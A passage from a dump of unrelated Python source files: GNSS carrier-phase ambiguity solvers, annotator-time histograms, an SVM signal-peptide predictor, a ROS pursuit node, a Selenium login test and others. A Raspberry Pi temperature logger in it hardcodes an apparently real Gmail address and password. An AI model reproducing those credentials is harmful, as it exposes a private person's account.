contains stuff I don't want to delete in case it's useful later,\nbut which I tried and found not to work/be necessary\n\"\"\"\n\nimport ctypes\nfrom laika.lib import coordinates\nfrom itertools import product\nimport math\nimport numpy\nfrom z3 import Solver, Optimize, Ints, Real, Reals, ToReal, sat, unsat\n\nimport tec\nimport tropo\n\nlambda_ws = {}\nlambda_ns = {}\nlambda_1s = {}\nlambda_2s = {}\nfor ident, freqs in tec.F_lookup.items():\n lambda_ws[ident] = tec.C/(freqs[0] - freqs[1])\n lambda_ns[ident] = tec.C/(freqs[0] + freqs[1])\n lambda_1s[ident] = tec.C/(freqs[0])\n lambda_2s[ident] = tec.C/(freqs[1])\n\nbrute = ctypes.CDLL(\"brute.so\")\nbrute.brute_force.restype = ctypes.c_double\nbrute.brute_force.argtypes = [\n ctypes.c_int32, ctypes.c_int32, # n1 and n2 double differences\n ctypes.c_void_p, # list of n1-n2 data\n ctypes.c_double, ctypes.c_double, # wavelengths\n ctypes.c_void_p, # Bi values\n ctypes.c_void_p, ctypes.c_void_p # output of best n1s and n2s\n]\nbrute.brute_force_harder.restype = ctypes.c_double\nbrute.brute_force_harder.argtypes = [\n ctypes.c_void_p, # list of n1-n2 data\n ctypes.c_double, ctypes.c_double, # wavelengths\n ctypes.c_void_p, # Bi values\n ctypes.c_void_p, ctypes.c_void_p # output of best n1s and n2s\n]\nbrute.brute_force_dd.restype = ctypes.c_double\nbrute.brute_force_dd.argtypes = [\n ctypes.c_int32, # double difference\n ctypes.c_double, # wavelength\n ctypes.c_void_p, # bias values\n ctypes.c_void_p, # output of best ns\n]\n\n\n\ndef frac_to_float(frac):\n # helper function for z3\n return (\n frac.numerator_as_long()\n / frac.denominator_as_long()\n )\n\ndef double_difference(calculator, station_data, sta1, sta2, prn1, prn2, tick):\n # generic double difference calculator\n v11 = calculator(station_data[sta1][prn1][tick])\n v12 = calculator(station_data[sta1][prn2][tick])\n v21 = calculator(station_data[sta2][prn1][tick])\n v22 = calculator(station_data[sta2][prn2][tick])\n\n if any([v is None for v in {v11, v12, v21, v22}]):\n return math.nan\n \n return (v11[0] - v12[0]) - (v21[0] - v22[0])\n\n\ndef phi_double_difference(station_data, sta1, sta2, prn1, prn2, tick):\n # has to be same frequency bands for this to work\n assert prn1[0] == prn2[0]\n\n return double_difference(\n tec.calc_carrier_delay,\n station_data, sta1, sta2, prn1, prn2, tick\n )\n\n\ndef widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick):\n \"\"\"\n use mw double differences to get\n (ddPhi_w - ddR_n)/lambda_w\n which should be the widelane integer ambiguity\n \"\"\"\n\n diff = double_difference(\n tec.melbourne_wubbena,\n station_data, sta1, sta2, prn1, prn2, tick\n )\n\n if math.isnan(diff):\n return diff\n \n lambda_w = lambda_ws[station_data[sta1][prn1][tick].prn[0]]\n return diff / lambda_w\n\ndef dd_solve_(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength):\n sol = Solver()\n r1s1, r1s2, r2s1, r2s2 = Ints('r1s1 r1s2 r2s1 r2s2')\n err = Real('err')\n err1, err1, err3, err4 = Reals('err1 err2 err3 err4')\n# sol.add(err > 0)\n\n sol.add(r1s1 - r1s2 - r2s1 + r2s2 == dd)\n\n sol.add(ToReal(r1s1)*wavelength + err1 > vr1s1)\n sol.add(ToReal(r1s1)*wavelength - err1 < vr1s1)\n\n sol.add(ToReal(r1s2)*wavelength + err2 > vr1s2)\n sol.add(ToReal(r1s2)*wavelength - err2 < vr1s2)\n\n sol.add(ToReal(r2s1)*wavelength + err3 > vr2s1)\n sol.add(ToReal(r2s1)*wavelength - err3 < vr2s1)\n\n sol.add(ToReal(r2s2)*wavelength + err4 > vr2s2)\n sol.add(ToReal(r2s2)*wavelength - err4 < vr2s2)\n\n if sol.check() != sat:\n return None\n \n def minimize():\n # try to push the error lower, if possible\n for mult in [0.5, 0.85]:\n while sol.check() == sat:\n sol.push()\n sol.check()\n err_bound = frac_to_float(sol.model()[err])\n if err_bound < 0.2:\n # not gonna do better than that...\n return\n sol.add(err < err_bound*mult)\n sol.pop()\n sol.check()\n \n minimize()\n return (\n [sol.model()[r].as_long() for r in [r1s1, r1s2, r2s1, r2s2]],\n frac_to_float(sol.model()[err])\n )\n\ndef dd_solve(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength):\n biases = numpy.array([vr1s1, vr1s2, vr2s1, vr2s2], dtype=numpy.double)\n ns = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n\n err = brute.brute_force_dd(\n ctypes.c_int32(int(dd)),\n ctypes.c_double(wavelength),\n biases.ctypes.data,\n ns.ctypes.data,\n )\n return ns, err, 0\n\ndef dd_solve_(dd, vr1s1, vr1s2, vr2s1, vr2s2, wavelength, ionosphere=False):\n sol = Optimize()\n r1s1, r1s2, r2s1, r2s2 = Ints('r1s1 r1s2 r2s1 r2s2')\n# err = Real('err')\n err1, err2, err3, err4 = Reals('err1 err2 err3 err4')\n# sol.add(err > 0)\n\n if ionosphere:\n ion = Real('ion')\n sol.add(ion > 0)\n sol.add(ion < 25)\n else:\n ion = 0\n\n sol.add(r1s1 - r1s2 - r2s1 + r2s2 == dd)\n\n sol.add(ToReal(r1s1)*wavelength + err1 > vr1s1 - ion)\n sol.add(ToReal(r1s1)*wavelength - err1 < vr1s1 - ion)\n\n sol.add(ToReal(r1s2)*wavelength + err2 > vr1s2 - ion)\n sol.add(ToReal(r1s2)*wavelength - err2 < vr1s2 - ion)\n\n sol.add(ToReal(r2s1)*wavelength + err3 > vr2s1 - ion)\n sol.add(ToReal(r2s1)*wavelength - err3 < vr2s1 - ion)\n\n sol.add(ToReal(r2s2)*wavelength + err4 > vr2s2 - ion)\n sol.add(ToReal(r2s2)*wavelength - err4 < vr2s2 - ion)\n\n objective = sol.minimize(err1 + err2 + err3 + err4)\n\n if sol.check() != sat:\n return None\n \n sol.lower(objective)\n if sol.check() != sat:\n return None\n\n return (\n [sol.model()[r].as_long() for r in [r1s1, r1s2, r2s1, r2s2]],\n [frac_to_float(sol.model()[err]) for err in [err1, err2, err3, err4]],\n frac_to_float(sol.model()[ion]) if ionosphere else 0\n )\n\ndef widelane_solve(dd, station_data, sta1, sta2, prn1, prn2, tick):\n vr1s1, lambda_w = tec.melbourne_wubbena(station_data[sta1][prn1][tick])\n vr1s2, _ = tec.melbourne_wubbena(station_data[sta1][prn2][tick])\n vr2s1, _ = tec.melbourne_wubbena(station_data[sta2][prn1][tick])\n vr2s2, _ = tec.melbourne_wubbena(station_data[sta2][prn2][tick])\n return dd_solve(dd, vr1s1, vr1s2, vr2s1, vr2s2, lambda_w)\n\ndef l1_ambiguity(station_data, sta1, sta2, prn1, prn2, tick):\n \"\"\"\n use widelane ambiguity and ionosphere free stuff\n to try to get l1 integer ambiguity\n \"\"\"\n\n # first estimate ionosphere free bias double difference\n def ionosphere_free_bias(*args):\n ret = tec.ionosphere_free(*args)\n if ret is not None:\n return ret[1] - ret[0], None\n \n ddbc = double_difference(\n ionosphere_free_bias,\n station_data, sta1, sta2, prn1, prn2, tick\n )\n\n nw = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if not math.isnan(nw):\n nw = round(nw)\n\n lambda_w = lambda_ws[station_data[sta1][prn1][tick].prn[0]]\n lambda_n = lambda_ns[station_data[sta1][prn1][tick].prn[0]]\n lambda_2 = lambda_2s[station_data[sta1][prn1][tick].prn[0]]\n\n return ddbc, ddbc / lambda_n - nw * lambda_w / lambda_2\n\n\n# earth's gravitational constant, this is slightly off in laika...\nmu = 398600441800000\ndef shapiro_cor(station_loc, sat_loc):\n \"\"\"\n general relativitistic correction factor\n \"\"\"\n station_r = numpy.linalg.norm(station_loc)\n sat_r = numpy.linalg.norm(sat_loc)\n distance_r = numpy.linalg.norm(station_loc - sat_loc)\n return (\n 2 * mu / tec.C**2 * numpy.log(\n (station_r + sat_r + distance_r)\n / (station_r + sat_r - distance_r)\n )\n )\n\ndef clock_cor(meas):\n return -2 * np.inner(meas.sat_pos, meas.sat_vel) / tec.C**2\n\n\n\ndef estimate_Bc(meas):\n# meas = station_data[sta][prn][tick]\n phase, pseudorange, wavelength = tec.ionosphere_free(meas)\n return phase - pseudorange, wavelength\n\ndef bias(signal):\n def f(meas):\n res = signal(meas)\n return res[0] - res[1], res[-1]\n return f\n\ndef geometry_free_solve(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks):\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n\n # Φ_i - R_i = B_i + err with B_i = b_i + λ_1*N_1 - λ_2*N_2\n B_i = bias(tec.geometry_free)\n \n Bis = [0, 0, 0, 0]\n\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n B_i_samples = []\n for tick in ticks:\n B_i_samples.append( B_i(station_data[sta][prn][tick])[0] )\n print(numpy.mean(B_i_samples), numpy.std(B_i_samples))\n Bis[i] = numpy.mean(B_i_samples)\n\n Bis = numpy.array(Bis, dtype=numpy.double)\n ws_ints = numpy.array(ws, dtype=numpy.int32)\n n1s = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n n2s = numpy.array([0, 0, 0, 0], dtype=numpy.int32)\n\n err = brute.brute_force(\n ctypes.c_int32(int(ddn1)),\n ctypes.c_int32(int(ddn2)),\n ws_ints.ctypes.data,\n ctypes.c_double(lambda_1),\n ctypes.c_double(lambda_2),\n Bis.ctypes.data,\n n1s.ctypes.data,\n n2s.ctypes.data\n )\n print(n1s, n2s, err)\n \"\"\"\n err = brute.brute_force_harder(\n ws_ints.ctypes.data,\n ctypes.c_double(lambda_1),\n ctypes.c_double(lambda_2),\n Bis.ctypes.data,\n n1s.ctypes.data,\n n2s.ctypes.data\n )\n print(n1s, n2s, err)\n \"\"\"\n return n1s, n2s, err\n\ndef geometry_free_solve_(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks):\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n\n # Φ_i - R_i = B_i + err with B_i = b_i + λ_1*N_1 - λ_2*N_2\n B_i = bias(tec.geometry_free)\n \n sol = Optimize()\n# sol = Solver()\n errs = Reals('err_11 err_12 err_21 err_22')\n n1s = Ints('n1_11 n1_12 n1_21 n1_22')\n n2s = Ints('n2_11 n2_12 n2_21 n2_22')\n\n sol.add(n1s[0] - n1s[1] - n1s[2] + n1s[3] == ddn1)\n sol.add(n2s[0] - n2s[1] - n2s[2] + n2s[3] == ddn2)\n\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n sol.add(n1s[i] - n2s[i] == ws[i])\n B_i_samples = []\n for tick in ticks:\n B_i_samples.append( B_i(station_data[sta][prn][tick])[0] )\n B_i_avg = numpy.mean(B_i_samples)\n# B_i_avg = B_i_samples[0]\n print(B_i_avg, numpy.std(B_i_samples))\n sol.add(lambda_1 * ToReal(n1s[i]) - lambda_2 * ToReal(n2s[i]) + errs[i] > B_i_avg)\n sol.add(lambda_1 * ToReal(n1s[i]) - lambda_2 * ToReal(n2s[i]) - errs[i] < B_i_avg)\n \"\"\"\n sol.add(errs[0] < .9)\n sol.add(errs[1] < .9)\n sol.add(errs[2] < .9)\n sol.add(errs[3] < .9)\n \"\"\"\n #sol.add(errs[0] + errs[1] + errs[2] + errs[3] < 17)\n objective = sol.minimize(errs[0] + errs[1] + errs[2] + errs[3])\n if sol.check() != sat:\n return None\n sol.lower(objective)\n if sol.check() != sat:\n return None\n# sol.add(errs[0] + errs[1] + errs[2] + errs[3] < 2)\n # can't do L2 norm with z3, L1 will have to do...\n# sol.(errs[0] + errs[1] + errs[2] + errs[3])\n\n \n return (\n [sol.model()[n1s[i]].as_long() for i in range(4)],\n [sol.model()[n2s[i]].as_long() for i in range(4)],\n [frac_to_float(sol.model()[errs[i]]) for i in range(4)],\n )\n\ndef test_n1_(N_w, station_data, sta, prn, ticks):\n # given N_w = N_1 - N_2\n # test out a N1/N2 combinations\n\n # get things that don't change base on N_1:\n # using N_w get b_w, delay_factor_w, B_c, B_i, wavelengths\n # for each N_1 candidate:\n # using N_w, N_1_candidate, B_c, estimate b_c, use that to get\n # a b_I estimate plug in to get ERR_1\n # using b_c, b_w, N_1_candidate, delay_factor_w, estimate b_I\n # and use that to get ERR_1\n\n lambda_1 = lambda_1s[prn[0]]\n lambda_2 = lambda_2s[prn[0]]\n lambda_n = lambda_ns[prn[0]]\n lambda_w = lambda_ws[prn[0]]\n\n b_w = numpy.mean([\n tec.melbourne_wubbena(station_data[sta][prn][tick]) for tick in ticks\n ]) - lambda_w * N_w\n\n freqs = tec.F_lookup[prn[0]]\n # TODO why are f1 and f2 reversed from what I expect?\n delay_factor_w = freqs[0]*freqs[1]/(freqs[1]**2 - freqs[0]**2)\n\n # TODO don't average out... look at results for each tick?\n B_c = numpy.mean([\n estimate_Bc(station_data[sta][prn][tick])[0] for tick in ticks\n ])\n gf_bias = bias(tec.geometry_free)\n B_i = numpy.mean([\n gf_bias(station_data[sta][prn][tick]) for tick in ticks\n ])\n\n\n N_1_best = None\n err_best = 10000\n\n for N_1_cand in range(-400, 400):\n N_2_cand = N_1_cand - N_w\n\n # TODO ???\n N_1_cand, N_2_cand = N_2_cand, N_1_cand\n\n b_c_meas = B_c - lambda_n * (N_1_cand + N_w * lambda_w / lambda_2)\n b_i_meas = B_i - lambda_1 * N_1_cand + lambda_2 * N_2_cand\n\n b_i_est = (b_w - b_c_meas) / delay_factor_w\n b_c_est = b_w - delay_factor_w * b_i_meas\n \n err1 = (b_i_est - b_i_meas)**2\n err2 = (b_c_est - b_c_meas)**2\n if err1 + err2 < err_best:\n err_best = err1 + err2\n N_1_best = N_1_cand\n return N_1_best, err_best\n\n\n\ndef solve_ambiguities(station_data, sta1, sta2, prn1, prn2, tick0, tickn):\n # step 0: remove ticks where we don't have all the data we need...\n # step 1: find widelane double difference to estimate ∆∇N_W\n # step 2: estimate ∆∇Bc and ∆∇N_W to estimate ∆∇N_1, ∆∇N_2\n # step 3: solve N_Ws\n # step 4: use ∆∇N_1, ∆∇N_2, N_Ws and measurements to estimate N1s and N2s\n\n # step 3: use fixed ∆∇N_1 to get better estimate of ∆∇Bc\n # step 4: use z3 and ∆∇Bc to estimate the actual Bc values\n # step 5: use Bc values to estimate N_1\n # step 6: use N_1 to estimate N_2 using the geometry free\n # combination\n\n # initialize wavelengths for this frequency band\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n lambda_n = lambda_ns[prn1[0]]\n lambda_w = lambda_ws[prn1[0]]\n\n # step 0/1: remove ticks with bad data + get widelane dd (∆∇N_W)\n widelane_dds = []\n ticks = []\n\n for tick in range(tick0, tickn):\n w = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if math.isnan(w):\n continue\n widelane_dds.append(w)\n ticks.append(tick)\n\n widelane_dd = numpy.mean(widelane_dds)\n print(\"wideland double difference: {0:0.3f} +/- {1:0.4f}\".format(\n widelane_dd, numpy.std(widelane_dds)\n ))\n\n widelane_dd = round(widelane_dd)\n\n # step 2:\n # i) estimate ∆∇Bc\n ddbcs = [\n double_difference(\n bias(tec.ionosphere_free),\n station_data, sta1, sta2, prn1, prn2, tick\n ) for tick in ticks\n ]\n ddbc = numpy.mean(ddbcs)\n print(\"ionosphere free bias dd: {0:0.3f} +/- {1:0.4f}\".format(\n ddbc, numpy.std(ddbcs)\n ))\n\n # ii) estimate ∆∇N_1\n ddn1 = (ddbc / lambda_n) - (lambda_w * widelane_dd / lambda_2)\n print(\"n1 double difference: {0:0.3f}\".format(ddn1))\n ddn1 = round(ddn1)\n\n # ii) estimate ∆∇N_2 (N_W = N_1 - N_2)\n ddn2 = ddn1 - widelane_dd\n print(\"n2 double difference: {0:0.3f}\".format(ddn2))\n\n # TODO somehow ddn1 and ddn2 are swapped???\n #ddn1, ddn2 = ddn2, ddn1\n\n # step 3:\n # estimate N_Ws\n ws, errs, _ = widelane_solve(widelane_dd, station_data, sta1, sta2, prn1, prn2, ticks[0])\n print(ws)\n print(errs)\n\n return ( geometry_free_solve(ddn1, ddn2, ws, station_data, sta1, sta2, prn1, prn2, ticks) )\n\n\ndef solve_ambiguities_(station_data, sta1, sta2, prn1, prn2, tick0, tickn):\n # step 0: remove ticks where we don't have all the data we need...\n # step 1: find widelane double difference to estimate ∆∇N_W\n # step 2: solve N_Ws\n # step 3: use N_Ws to solve for probable N_1s\n\n # initialize wavelengths for this frequency band\n lambda_1 = lambda_1s[prn1[0]]\n lambda_2 = lambda_2s[prn1[0]]\n lambda_n = lambda_ns[prn1[0]]\n lambda_w = lambda_ws[prn1[0]]\n\n # step 0/1: remove ticks with bad data + get widelane dd (∆∇N_W)\n widelane_dds = []\n ticks = []\n\n for tick in range(tick0, tickn):\n w = widelane_ambiguity(station_data, sta1, sta2, prn1, prn2, tick)\n if math.isnan(w):\n continue\n widelane_dds.append(w)\n ticks.append(tick)\n\n widelane_dd = numpy.mean(widelane_dds)\n print(\"wideland double difference: {0:0.3f} +/- {1:0.4f}\".format(\n widelane_dd, numpy.std(widelane_dds)\n ))\n\n widelane_dd = round(widelane_dd)\n\n # step 2:\n # estimate N_Ws\n ws, errs, _ = widelane_solve(widelane_dd, station_data, sta1, sta2, prn1, prn2, ticks[0])\n\n # step 3:\n ns = []\n for i, (sta, prn) in enumerate(product([sta1, sta2], [prn1, prn2])):\n n1, err = test_n1(ws[i], station_data, sta, prn, ticks)\n n2 = n1 - ws[i]\n ns.append( (n1, n2, err) )\n \n return ns\n\ndef lambda_parms(y, A, B, Qy):\n Qyinv = numpy.linalg.inv(Qy)\n print(Qyinv)\n\n Pb = B @ numpy.linalg.inv(B.T @ Qyinv @ B) @ B.T @ Qyinv\n Pb_perp = numpy.eye(2) - Pb\n Abar = Pb_perp @ A\n\n print(Abar)\n\n print(Abar.T @ Qyinv @ Abar)\n Qa = numpy.linalg.inv(Abar.T @ Qyinv @ Abar)\n\n ahat = Qa @ Abar.T @ Qyinv @ y\n return ahat, Qa\n","sub_path":"pytid/graveyard/ambiguity_correct_graveyard.py","file_name":"ambiguity_correct_graveyard.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94681243","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pylab\n\n'''g = open('/Users/saraswathivenkatesh/svenkate-surf-2011-mturk/data/birdscale/\\\nimage-ids.yaml', 'r')\nnames = []\nIds = []\nx = g.readline()\nwhile x != \"\":\n x = x.split()\n for i, j in enumerate(x):\n if i%2 == 0:\n if j[0] == '{':\n j = j[1:]\n names.append(int(j[14:-5]))\n else:\n Ids.append(j[:-1])\n x = g.readline()\ng.close()\nIdssort = [0 for i in range(256)]\nfor i in range(256):\n indx = names.index(i)\n Idssort[i] = Ids[indx]\n\nh = open('birdimageIds.txt', 'r')\nIdsordered = []\nx = h.readline()\nwhile x != \"\":\n x = x.split()\n Idsordered.append(x[1])\n x = h.readline()\nh.close()'''\n\nf = open('birdtime.txt', 'r')\ntimes = []\nx = f.readline()\nwhile x != \"\":\n t = []\n if x != \"\\n\":\n x = x.split()\n for i,j in enumerate(x):\n if j != '0':\n t.append(int(j))\n times.append(t)\n x = f.readline()\n \nf.close()\n\n'''avgT = []\nfor t in range(len(times[0])):\n sm = 0\n div = 0\n for ann in times:\n if ann[t] != 0:\n sm += float(ann[t])\n div += 1\n avgT.append(sm/div)'''\n \n'''avgTsort = [0 for i in range(len(avgT))]\nfor i, j in enumerate(avgT):\n label = Idsordered[i]\n indx = Idssort.index(label)\n avgTsort[indx] = int(j)'''\n \n#x = range(len(avgT))\navgmedian = 0\navgmean = 0\nalltimes = []\n\nfor i,j in enumerate(times):\n fig, ax = plt.subplots(1)\n bins = [float(k)/5 for k in range(0,21)]\n n, b = np.histogram(np.log10(j), bins)\n bincenters = [10**(k+.1) for k in bins[:-1]]\n plt.semilogx(bincenters, n)\n plt.xlabel('Time spent (ms)')\n plt.ylabel('Count')\n plt.title('Histogram of time spent by Annotator '+str(i))\n plt.ylim(ymax=110)\n median = np.median(j)\n avgmedian += median\n mu = np.mean(j)\n avgmean += mu\n textstr = '$\\mu=%.2f$\\n$\\mathrm{median}=%.2f$' %(mu, median)\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n ax.text(0.1, 0.95, textstr, transform=ax.transAxes, fontsize=14,\\\n verticalalignment='top', bbox=props)\n plt.savefig('Ann'+str(i)+'-times-bird.png')\n alltimes.append(mu)\n \nf = open('alltimes-bird.txt', 'w')\nfor i in alltimes:\n f.write(str(i)+' ')\nf.close()\n \navgmedian = avgmedian/len(times)\navgmean = avgmean/len(times)\nfig, ax = plt.subplots(1)\nbins = [float(k)/5 for k in range(0,21)]\nn, b = np.histogram(alltimes, bins)\nbincenters = [10**(k+.1) for k in bins[:-1]]\nplt.semilogx(bincenters, n)\nplt.xlabel(\"Time Spent (ms)\")\nplt.ylabel(\"Count\")\nplt.title(\"Histogram of Time Spent by All Annotators\")\nprops = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\ntextstr = '$\\mu=%.2f$\\n$\\mathrm{median}=%.2f$' %(avgmean, avgmedian)\nax.text(0.1, 0.95, textstr, transform=ax.transAxes, fontsize=14, \\\n verticalalignment='top', bbox=props)\nplt.savefig('bird-avgtimes.png')","sub_path":"Algorithms/Mturk-data/Birds/TimeHist-bird.py","file_name":"TimeHist-bird.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"438881788","text":"###-------This code predicts the topology of multiple sequences as an S if it's signal peptide or . if it's not, in form of ID, sequence and topology----------###\n\nimport input_good\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.externals import joblib\n\n\nloaded_model = joblib.load('signalP+_model2.sav')\nwindow_size = 39\n\ndef predict_signalP(filename2):\n \n predicting_topo = input_good.parser_output(filename2)\n z = loaded_model.predict(predicting_topo) \n results = z\n \n signalP_decode = {0:\".\",4:\"S\"}\n decoded_topo_list = []\n for element in results:\n decoded_topo_list.append(signalP_decode[element])\n \n endSP = 0\n start = 0\n \n filet = open(filename2,'r+')\n texti = filet.read().splitlines()\n for lines in range(len(texti)):\n #print(lines)\n if texti[lines].startswith (\">\"):\n endSP = endSP +len(texti[lines+1])\n j =\"\".join(decoded_topo_list[start:endSP])\n print(texti[lines])\n print(texti[lines+1])\n print(j)\n start = endSP\n \n \n \nif __name__ == '__main__':\n predict_signalP('predict_protein.txt')\n\n","sub_path":"Protein_prediction_SVM/optimized_predictor.py","file_name":"optimized_predictor.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"351028605","text":"#!/usr/bin/python\n\nfrom sys import stdin, stdout\n\nT = int(stdin.readline().strip())\n\nfor case_num in range(1, T+1):\n pancakes = stdin.readline().strip()\n i = 1\n total = 0\n while i < len(pancakes):\n if pancakes[i-1] != pancakes[i]:\n total += 1\n i += 1\n if pancakes[len(pancakes)-1] == '-':\n total += 1\n answer = str(total)\n stdout.write(\"Case #{:d}: {:s}\\n\".format(case_num, answer))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_ackien_main.py","file_name":"16_0_2_ackien_main.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486947409","text":"# $language = \"Python\"\r\n# $interface = \"1.0\"\r\nimport sys\r\nsys.path.append('.')\r\nimport testlib\r\nreload(testlib)\r\ntestlib.init()\r\nif __name__ == '__builtin__':\r\n testlib.crt = crt\r\n sys.dont_write_bytecode = True\r\n\r\nfiles=[\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch0).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch1).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch2).py',\r\n 'test_dsp0_i2s(i2s1-i2sadc-rxch[0-2]).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch0).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch1).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch2).py',\r\n 'test_dsp0_i2s(i2sdac-i2sadc-rxch[0-2]).py',\r\n ]\r\n\r\nmenu=''\r\ncount=1\r\nmenu_option=-1\r\n\r\nfor str1 in files:\r\n menu= menu + str(count)+'. '+str1.split('.')[0] + '\\n'\r\n count = count+1\r\n\r\nwhile (menu_option > count or menu_option < 1):\r\n menu_select = str(count)\r\n menu_select = crt.Dialog.Prompt(menu,\"Select I2S test item\", '1', False)\r\n if menu_select == '':\r\n exit()\r\n if (int(menu_select) >= 1) and (int(menu_select) < count):\r\n execfile(files[int(menu_select)-1])\r\n exit()\r\n","sub_path":"cdl_fpga/dsp1/test_dsp1_i2s.py","file_name":"test_dsp1_i2s.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"50061460","text":"#Code to read from Digital Temperature probe and report information to Google Docs.\n#Code written and tested 29/08/2014 working ok.\n\n#import files necessary for code to run\nimport os\nimport glob\nimport time\nimport sys\nimport gspread\nimport datetime\n\n#Google account details\nemail = 'jeremygwest@gmail.com'\npassword = '63v1b5y4'\nspreadsheet = 'Temperature_Log' #the name of the spreadsheet already created\n \n#attempt to log in to your google account\ntry:\n gc = gspread.login(email,password)\nexcept:\n print('fail')\n sys.exit()\n \n#open the spreadsheet\nworksheet = gc.open(spreadsheet).sheet1\n\n#confirm the temeprature probe is connected\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n#locate temperature probe log file for reading temperature\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n#read raw data from temperature probe\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n#convert data to human readable temperature\ndef read_temp():\n lines = read_temp_raw()\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp = float(temp_string) / 1000.0\n #temp_f = temp_c * 9.0 / 5.0 + 32.0\n return temp, #temp_f\n\t\n#print temperature to google docs\nwhile True: #infinite loop\n temp = read_temp() #get the temp\n values = [datetime.datetime.now(), temp[0]]\n worksheet.append_row(values) #write to the spreadsheet\n time.sleep(600) #wait 10 minutes\n\n","sub_path":"templog google docs v1.1.2.py","file_name":"templog google docs v1.1.2.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"186821633","text":"#!/usr/bin/env python\nimport rospy\nimport math\nimport tf\nfrom geometry_msgs.msg import Twist \nfrom nav_msgs.msg import Odometry\n\nif __name__ =='__main__':\n\t\n rospy.init_node('tf_listen') # Initializing the a node\n listener = tf.TransformListener()\n rob_vel = rospy.Publisher('/robot_1/cmd_vel',Twist,queue_size = 1) # Publishing command velocity to move the robot\n rate = rospy.Rate(100.0)\n \n while not rospy.is_shutdown():\n try:\n now = rospy.Time.now()\n listener.waitForTransform(\"/robot_1/odom\",\"/robot_0/odom\", rospy.Time(0), rospy.Duration(1.0))\n (trans,orie) = listener.lookupTransform('/robot_1/odom','/robot_0/odom', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException,tf.ExtrapolationException):\n continue\n angular = 4 * math.atan2(trans[1], trans[0])\n linear = 0.5 * math.sqrt(trans[0] ** 2 + trans[1] ** 2)\n cmd = Twist()\n cmd.linear.x = linear\n cmd.angular.z = angular\n rob_vel.publish(cmd)\n rate.sleep()\n","sub_path":"Cognition/evader-pursuer/scripts/tflisten.py","file_name":"tflisten.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"42802680","text":"import time\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\n#edited\n\nclass AssignmentHrm(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print(\"This will get executed only once before the setUp method for the first test\")\n\n @classmethod\n def tearDownClass(cls):\n print(\"This will get executed only once after the tearDown method for the last test\")\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r\"C:\\Users\\rajdeep.m\\PycharmProjects\\duringclass\\resources/chromedriver.exe\")\n self.driver.maximize_window()\n\n def tearDown(self):\n self.driver.quit()\n\n def test_combo(self):\n self.driver.get(\"https://opensource-demo.orangehrmlive.com/\")\n username = self.driver.find_element_by_id(\"txtUsername\")\n username.send_keys(\"Admin\")\n password = self.driver.find_element_by_id(\"txtPassword\")\n password.send_keys(\"admin123\")\n self.driver.find_element_by_id(\"btnLogin\").click()\n time.sleep(3)\n leavellist = self.driver.find_element_by_partial_link_text(\"Leave List\")\n leavellist.click()\n time.sleep(3)\n scheduled = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_2\")\n if not scheduled.is_selected():\n scheduled.click()\n taken = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_3\")\n if not taken.is_selected():\n taken.click()\n pending_for_approval = self.driver.find_element_by_id(\"leaveList_chkSearchFilter_1\")\n if pending_for_approval.is_selected():\n pending_for_approval.click()\n subunit = self.driver.find_element_by_id(\"leaveList_cmbSubunit\")\n subunitselect = Select(subunit)\n subunitselect.select_by_visible_text(\"IT\")\n expected_options = [\"All\",'Sales','Administration','IT','Finance']\n actual_options = 